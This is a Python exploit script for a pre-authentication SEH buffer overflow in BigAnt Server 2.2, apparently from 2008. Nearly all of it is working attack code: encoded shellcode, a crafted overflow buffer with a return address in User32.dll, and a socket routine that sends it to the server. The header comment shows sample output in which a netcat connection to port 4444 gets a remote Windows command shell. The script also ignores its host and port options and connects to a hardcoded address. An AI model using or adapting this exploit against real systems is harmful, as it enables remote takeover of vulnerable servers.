antserver_exploit.py.txt

`#!/usr/bin/python  
###############################################################################  
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)  
# Matteo Memelli aka ryujin  
# www.be4mind.com - www.gray-world.net  
# 04/13/2008  
# Tested on Windows 2000 Sp4 English  
# Vulnerable process is AntServer.exe   
# Offset for SEH overwrite is 954 Bytes  
#  
#------------------------------------------------------------------------------  
# muts you gave me the wrong pill! it's your fault!!!   
# I wanna go back to the matrix  
#------------------------------------------------------------------------------  
#  
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080  
# [+] Connecting to host...  
# [+] Overflowing the buffer...  
# [+] Done! Check your shell on 192.168.1.195:6080  
# bt ~ # nc -vv 192.168.1.195 4444  
# 192.168.1.195: inverse host lookup failed: Unknown host  
# (UNKNOWN) [192.168.1.195] 4444 (krb524) open  
# Microsoft Windows 2000 [Version 5.00.2195]  
# (C) Copyright 1985-2000 Microsoft Corp.  
#  
# C:\WINNT\system32>  
#  
###############################################################################  
from socket import *  
from optparse import OptionParser  
import sys  
  
print "[*********************************************************************]"  
print "[* *]"  
print "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]"  
print "[* Discovered and Coded By *]"  
print "[* Matteo Memelli *]"   
print "[* (ryujin) *]"   
print "[* www.be4mind.com - www.gray-world.net *]"  
print "[* *]"  
print "[*********************************************************************]"  
usage = "%prog -H TARGET_HOST -P TARGET_PORT"  
parser = OptionParser(usage=usage)  
parser.add_option("-H", "--target_host", type="string",  
action="store", dest="HOST",  
help="Target Host")  
parser.add_option("-P", "--target_port", type="int",  
action="store", dest="PORT",  
help="Target Port")  
(options, args) = parser.parse_args()  
HOST = options.HOST  
PORT = options.PORT  
if not (HOST and PORT):  
parser.print_help()  
sys.exit()  
  
# Tried with SEH/THREAD/PROCESS but server crashes anyway  
# [*] x86/alpha_mixed succeeded, final size 698 SEH  
shellcode = (  
"\x89\xe1\xda\xc0\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"  
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"  
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"  
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"  
"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4a\x59\x4b\x4f\x4b"  
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x47\x54\x47\x54\x4c\x4b"  
"\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x45\x51\x4a"  
"\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"  
"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"  
"\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x42\x54\x44\x47"  
"\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47"  
"\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"  
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"  
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"  
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x49\x53\x50\x31\x49"  
"\x4b\x42\x44\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x47\x30\x44\x4c"  
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"  
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"  
"\x4e\x36\x42\x46\x51\x43\x42\x46\x43\x58\x47\x43\x50\x32\x42"  
"\x48\x42\x57\x43\x43\x50\x32\x51\x4f\x51\x44\x4b\x4f\x4e\x30"  
"\x43\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"  
"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x45\x58"  
"\x43\x32\x50\x55\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x49"  
"\x49\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x46\x33"  
"\x46\x33\x50\x53\x50\x53\x46\x33\x47\x33\x46\x33\x51\x53\x46"  
"\x33\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x45\x36"  
"\x50\x53\x4b\x39\x4d\x31\x4c\x55\x42\x48\x49\x34\x44\x5a\x44"  
"\x30\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x42\x30\x46\x31"  
"\x51\x45\x4b\x4f\x48\x50\x43\x58\x4e\x44\x4e\x4d\x46\x4e\x4b"  
"\x59\x51\x47\x4b\x4f\x48\x56\x46\x33\x50\x55\x4b\x4f\x48\x50"  
"\x42\x48\x4a\x45\x47\x39\x4b\x36\x47\x39\x51\x47\x4b\x4f\x4e"  
"\x36\x46\x30\x46\x34\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"  
"\x43\x58\x4a\x47\x44\x39\x49\x56\x44\x39\x46\x37\x4b\x4f\x49"  
"\x46\x46\x35\x4b\x4f\x48\x50\x42\x46\x43\x5a\x42\x44\x45\x36"  
"\x42\x48\x45\x33\x42\x4d\x4c\x49\x4d\x35\x42\x4a\x50\x50\x46"  
"\x39\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x51\x54\x4d\x59"  
"\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"  
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58"  
"\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48\x43\x42\x4b\x4e\x4e\x53\x42"  
"\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56\x51\x4b\x50\x57"  
"\x46\x32\x46\x31\x50\x51\x50\x51\x43\x5a\x43\x31\x46\x31\x50"  
"\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49"  
"\x43\x35\x48\x4e\x50\x53\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"  
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"  
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x46\x32\x4b\x4f\x4e\x30\x45"  
"\x38\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x48\x56"  
"\x4b\x4f\x48\x50\x44\x4a\x41\x41"  
)  
  
# 77F8AEDC POP POP RET User32.dll Win 2000 Sp4  
evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \  
'\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \  
'C'*1225  
print '[+] Connecting to host...'  
s = socket(AF_INET, SOCK_STREAM)  
s.connect(('192.168.1.195', 6080))  
print '[+] Overflowing the buffer...'  
s.send('GET ' + evilbuf + "\n\n")  
s.close()  
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)  
  
`